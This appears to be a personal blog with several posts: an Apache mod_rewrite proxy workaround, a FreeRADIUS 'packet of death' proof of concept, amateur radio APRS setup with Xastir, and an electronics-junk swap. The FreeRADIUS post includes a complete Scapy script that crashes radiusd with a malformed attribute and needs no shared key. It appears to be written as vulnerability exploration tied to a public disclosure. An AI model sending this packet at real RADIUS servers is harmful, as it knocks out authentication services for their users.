DirectorySlash Hacking

The other day I came across the following scenario: A customer wanted to use Apache proxying to hide the virtual hostname that his customers were really pulling content from. The rewrite rule on the “masking host” (which I refer to as www.proxy.net in these examples) is easy enough:

RewriteRule ^/~(.*)$ http://user.proxiedto.net/~$1 [P]

Which works pretty well:

How the mod_rewrite [P] works.

The problem is what happens when DirectorySlash is enabled on the proxied-to host  (which it is by default). DirectorySlash fixes incorrectly identified resources – as an example, if you request a directory but without the trailing forwardslash.

GET /~gillespiem/images HTTP/1.1
Host: www.proxy.net

In this instance, you get a 301 redirect that appends a “/” to the end of the request BUT also sets the Location header to  the proxied-to virtualhostname.  The Jig is up – and now the address bar in the browser indicates the real host the end-user is speaking to :

When mod_rewrite [P] and DirectorySlash collide.

Here’s a snippet of response from the site:

HTTP/1.1 301 Moved Permanently
Date: Tue, 27 Oct 2009 16:28:27 GMT
Server: Apache/2.2.3 (CentOS)
Location: http://user.proxiedto.net/~gillespiem/images/

I’ve not been able to find an easy way to change what DirectorySlash uses in the Location header (maybe you can’t). DirectorySlash is important, so simply not using it won’t work in this application. Instead, I opted to use a RewriteMap to simply write my own version:  DirectorySlashHack and enable it in the vhost container (on the proxy-to site) ala:

DirectorySlash off
RewriteMap directoryslashhack        prg:/etc/httpd/maps/directoryslashhack
RewriteRule ^/~([^/]+)(/?.*)         ${directoryslashhack:%1*$1*$2}

While the solution is hack-ish (and the script and rewriterule could use a small bit of cleanup), it seems to work so far. The perl script determines if the requested resource is a directory, and if so it issues the appropriate 301 redirect using a customizable location header (which allows me to force the cleaned-up request back to the proxy).

Freeradius Packet of Death

I haven’t had a chance to use Scapy in a little while, and I don’t spend hardly any time in Python (don’t really know the language at all, to be honest), but a long time ago I was searching for an IPv6 capable successor to Hping. Scapy almost fits the bill.

Earlier today, while reading through Full Disclosure, I came across something interesting: a Freeradius DoS bug. This piqued my interest as I’m currently experiencing _something_ that’s periodically knocking over radiusd. Furthermore, the radius server in question talks to a router with problematic L2TP tunnels (caused by a software bugs in L2TP sequencing on the Telco router on the other end…their vendor has confirmed the problems)

Time to create the packet of death. Scapy doesn’t appear to have a layer for RadiusAttributes yet, thankfully it IS in their Trac.

So, download the layer to scapy/layers, ensure that it imports the required items:

import struct
from scapy.packet import *
from scapy.fields import *
from scapy.layers.inet import UDP

from scapy.layers.radius import Radius

Add “radiuslib” to the load_layers array in config.py, and we’re ready to go:

#!/usr/bin/env python
# FreeRadius Packet Of Death
# Matthew Gillespie 2009-09-11

import sys
from scapy.all import IP,UDP,send,Radius,RadiusAttr

if len(sys.argv) != 2:
print “Usage: radius_killer.py <radiushost>\n”
sys.exit(1)

PoD=IP(dst=sys.argv[1])/UDP(sport=60422,dport=1812)/ \
Radius(code=1,authenticator=”\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99″,id=180)/ \
RadiusAttr(type=69,value=””,len=2)

send(PoD)

(download)

Interestingly, one doesn’t need a shared key to send the packet of death, as you can tell the authenticator for the Access-Request packet is pulled out of thin air.

I’m assuming that most people iptable off access to their radius servers, so playing whack-a-mole with a provider probably isn’t that do-able. Beyond that, to even come close to possibly exploiting this, you need to be listed in clients.conf – so there’s already that level of trust.  Correct me if I’m wrong. Either way, updated packages are available.

RIP Milw0rm

APRS using Xastir

A couple months back,  I finally took my Amature Radio Technicians exam. The exam location nearest me gave the exam for free, and with only 35 questions it doesn’t involve copius amounts of studying.

After a friend opened my eyes to a few fun things one can do w/ a radio scanner, I went on a “learning tangent”, reading and talking to people w/ Amature licenses, digesting everything that one can do w/ a radio these days.

One of the things that’s interested me the most is APRS. Using Xastir, one can track mobile and static APRS stations in your area.

Xastir focused on Central Pennsylvania

There’s some interesting stuff out there – in my area there’s a trucker (N6GVG) that I’ve followed, making runs from West Virginia, to Tennesse, to Pennsylvania, and from there to New Jersey. (I’m a HUGE fan of Open Transport Tycoon Deluxe, if you’ve not played it – seriously, get it. I only wish American trains were equiped w/ APRS)

Extremely fun and addictive
The Extremely fun and addictive OTTD

I’d purchased a Yaesu-VX7R from ebay for just under $290.00.

Yaesu-VX7R with a CT-91 cable attached.

With the amature license in tow (KB3TCN), I decided I’d start sending out my own beacons. Problem was, I couldn’t figure out how to interface my soundcard (I’m using soundmodem) with the Yaesu. I’d already purchased the CT-91 cable from ebay (it splits out from a 4 tipped 3.5mm plug to a 3.5mm headphone plug and 2.5mm mic input), but simply connecting the soundcard to the mic input (using an adapter) didn’t work (and was probably incredibly stupid to try). Doing so keeps the radio keyed, and I’m sure is bad.

After talking to the gang on freenode:#hamradio and looking at the manual for TNC connection, it turns out the solution is fairly simple – two interfaces utilizing various isolation transformers (see http://www.qsl.net/wm2u/interface.html for a good intro, I’ll post my modified schematics shortly… I actually wrote this post months ago)

The optimal voltage is 5mV with 2kohms of resistance. My circuit gets it pretty close (btw, I can’t take responsibility for any harm this circuit causes, use at your own discretion. Seriously, don’t trust my judgement – this is how I change a car tire).

Anyway, it’s working for me. I had to pump the soundcard output up pretty high, but I’ve got my beacon reportedly seen by others. (It’s been a few weeks since I’ve transmitted, as my next project is to do a PIC based tracker for my car)

Happy Birthday: The Great Internet Migratory Box Of Electronics Junk

Time flies.

It was one year ago that I first read about the “Great Internet Migratory Box of Electronics Junk”. It piqued my interest then, but I never bothered to put myself onthe list…

Box o Junk
Box o' Junk

Well, I’ve been working more and more on a small handful of projects, and maybe I can find something useful (I’ve also got plenty of decent stuff to rid myself of). So today, my name is on the list… if I get a box, I’ll let you know what I found (with pics).

(If you’re sending a box, just leave me a private comment and I’ll give you contact information)